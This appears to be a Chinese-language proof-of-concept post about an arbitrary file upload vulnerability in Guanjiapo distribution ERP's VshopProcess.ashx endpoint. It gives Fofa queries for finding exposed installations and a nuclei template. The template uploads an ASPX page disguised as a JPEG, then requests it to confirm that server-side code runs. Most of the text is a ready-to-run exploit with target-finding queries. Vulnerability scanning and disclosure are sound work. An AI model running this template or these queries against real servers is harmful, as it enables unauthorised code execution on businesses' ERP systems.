管家婆订货易在线商城

管家婆分销ERP VshopProcess 任意文件上传

Fofa：title="订货易"||title="管家婆分销ERP" || body="管家婆分销ERP" || body="ERP V3"

nuclei

id: guanjiapo_ERP-fileupload-VshopProcess
info:
  name: guanjiapo_ERP-fileupload-VshopProcess
  author: BY
  severity: critical
  description: 管家婆分销ERP  VshopProcess 任意文件上传
  tags: guanjiapo

variables:
  boundary: "{{rand_base(6)}}"
  filename: "{{rand_base(5)}}"

http:
  - raw:
      - |
        POST /API/VshopProcess.ashx?action=PostFileImg HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/57.0.578.100 Safari/537.36
        Accept-Encoding: gzip
        Connection: close
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytCOFhbEjc3IfYaY5

        ------WebKitFormBoundarytCOFhbEjc3IfYaY5
        Content-Disposition: form-data; name="fileup1i"; filename="{{filename}}.aspx"
        Content-Type: image/jpeg

        <%@ Page Language="C#"%><% Response.Write("{{boundary}}");System.IO.File.Delete(Server.MapPath(Request.Url.AbsolutePath)); %>
        ------WebKitFormBoundarytCOFhbEjc3IfYaY5--
        
      - |
        GET {{name}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0

    extractors:
      - type: regex
        name: name
        part: body
        internal: true
        regex:
          - ".*.aspx"
      
    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - status_code_1 == 200 && contains(body_2,'{{boundary}}')

管家婆订货易在线商城

管家婆分销ERP VshopProcess 任意文件上传​

管家婆分销ERP VshopProcess 任意文件上传